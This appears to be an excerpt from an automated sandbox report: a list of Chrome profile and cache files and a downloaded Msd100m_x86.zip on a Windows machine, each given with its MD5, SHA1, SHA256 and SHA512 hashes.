C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | cf8a0399b1b1e7b6833c504380978381 |
| SHA1 | 9b1770dc95346d9f0a0a544264eca218abe0c66f |
| SHA256 | 129e640f1965ae48b643b061f61a3de584e12ecfe0b9668bd990d4e699e7dd71 |
| SHA512 | 690cef399c60bdc09f5ffde5efb914d4cd5d520d182b4e21dd17c2326d8806f501113472bd6b022f6dd2418cdb03774b41e5f8579a40849dcf21639f0134dd54 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000035
| MD5 | 5683ae67206fba65c28d03862894f3c8 |
| SHA1 | ff806385ff84415d6928f3cf82cb1fa49951d9c8 |
| SHA256 | 88d1a59789b2e017c8725f362c289dd46e9c40eded9e74df2d9b3def0a821598 |
| SHA512 | 25b071ae288844c548183fa57a274af1ee93d1ef1203a02386499a057a93bbc81d113eb1ba61fdd856eb5ae4bc08b282b7e36cd9bd54a5ea7dfa1f1bbad8cc00 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000034
| MD5 | 057b37cd68b1f02e1cb8150b00f54c9d |
| SHA1 | 829de87cdea0b8f3a877292eb451c2f2430dcd98 |
| SHA256 | c8da3c4bf014cba89ad4beb4cafce17a933f71358f1df0454df8f1302fb48f9b |
| SHA512 | f2133d8dc6eb4e386f6517ebb21b7fcebdf7d2f5d2a2fbbe4b021002dfce50b826852164f903dc3533107f25ec4c26ec087abcd4b3fe41dd62551e5571b87520 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000032
| MD5 | 035180be4cc4c52390ab8b5596662898 |
| SHA1 | 2872ad7def1cc6b17ed52975e664ffd060aa48bc |
| SHA256 | 2352daa6450558472b0fba50e5f1619a1b688a195f70578cb2e28120caa37981 |
| SHA512 | c2c829808071edd40f5e82e6e023b50a17cf47ce06cc4e0c6b35d998964cb5dc552a668841dafd79c758aadc128095205dc4801615e1d9a12b339b4a2e8a0892 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000031
| MD5 | ac7d38595509d2daf9a67442d51804de |
| SHA1 | 68b16b7d8aaf27b7d94239a2d0dd092e860c7c87 |
| SHA256 | 9a9cb86a52068e748954454f1adb05015af44075a75743623e0c97b01783ae5f |
| SHA512 | 6cda6e5c8501eaa9424f1c9bdbcfec85725fb8de6473454852497f4c97082a729c90ca51d8746fc445a99092a5fb4714e5de4cada8e5b78bf5201eb2e8df3688 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6b4dfa79cdea3a83d8d1f9af8f4a9a7e |
| SHA1 | 6e468bbff183c888f471dc78df727053515d5403 |
| SHA256 | adbe8fb67008375b4569daa4288ed909319e8c3e25d65486845812e4d65f4b44 |
| SHA512 | f89ef2a2b71d4a473d469972b86daf6c6a143ce33b15b9b66e04e3888e24941d92e2a87b29331465bb4956f8e815eead96f8486a2467d3941923642188ebc4cb |
C:\Users\Admin\Downloads\Msd100m_x86.zip
| MD5 | 56b5c81d3bb38d4291bee814d8a8de9a |
| SHA1 | 6a20b04c074ce03cf910657216272383c4f8badb |
| SHA256 | 3781de0bf1f084ac0e1d96b25bc67d01e4c75fe5efda4110eb592c7b10202a44 |
| SHA512 | c5121e934481cf11d126cf34bb77610a28b011917b45c561e6db1f9b015f02be9f701b0f3fdb9a0229cc7176c66795aa782f1db64a6ba4d08f87d2848f74e317 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6dcd837ee6405295342bc02cb82dfb8b |
| SHA1 | b9594ddf1b994fc45bd640620f31ae73656ec311 |
| SHA256 | 28c69175098c3e7afebefbd70abf4eddbd0938a6ddf536fcf18b7a8a74c8f7eb |
| SHA512 | 901493e9e5943e995f4b07a255f85602e9e13b94f9765495cf717095f8e8c3d5b9578cc31ac2fe2a7ae6ba8ac65eec87c1a37a0e831cb3a8100007dad0f92a60 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f5e88d0b3577becdbf62a8e4621c741a |
| SHA1 | 94138599ab65908dfc49808cd973ddd04d6559c4 |
| SHA256 | 342b3de7f7c8dc779e373e027cfe29630ac3ee88b74d403369e3c5c00627d80d |
| SHA512 | a24565dfb66605efbef8b71ad812d5ffa8f45bfef165f73612bfcb8399ad5f4c55d0de41f17faeb5eab26881f8e7c61c130091318fce5b8a8ef02b11eccdb529 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | c9cb2975537cae7866c4e45a2a28a330 |
| SHA1 | 501f7657a1d34900f60effa76d03766075d17112 |
| SHA256 | 68d8706aaea8007daccaabf26a04de30642ed22c2246b4381ab8daf1cfb9996e |
| SHA512 | 8680091c6772a7216189f0c34e42fee6569105372043ebacd5d79a5e4c5e74460c3295614a610c31e3e0c02a3354b2fb7a491503bf5754df7e943ce2c4aa47f2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | b6b42ec90907a3f9d7898e5b76b6e4cf |
| SHA1 | 2deecf0feb08d077068484014ab0a02283414df2 |
| SHA256 | 71a20eefd9cce1d0018da85180fc74f35ffc2ba56c1d83082ecca5b1202390d1 |
| SHA512 | 76a82baffa24e3fbc7107d3dc8d04e04eaba71317689382738f754271a226f117fe7ab1b5e6997e7f94cecb9d4bdea8a4f34ce0e057aa8ac2e59d97b30c710da |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | faa5d92c4dc5ee155f131fcbeaf95738 |
| SHA1 | 8f21c2a49f3bc3fd9e8bf690bcf58c611f23e437 |
| SHA256 | d5b4ffd9ff6edde4562766ecdda113f8677ef61629e842cbed4359994682350e |
| SHA512 | 9f75d747d2aca2c1847c48ecea753e24abed1df9f6508435660b1562f3c8628ab2bc7d040f946e0db96406d3b3678f782fce64fa2975c8c4bc8324ec1cf5d178 |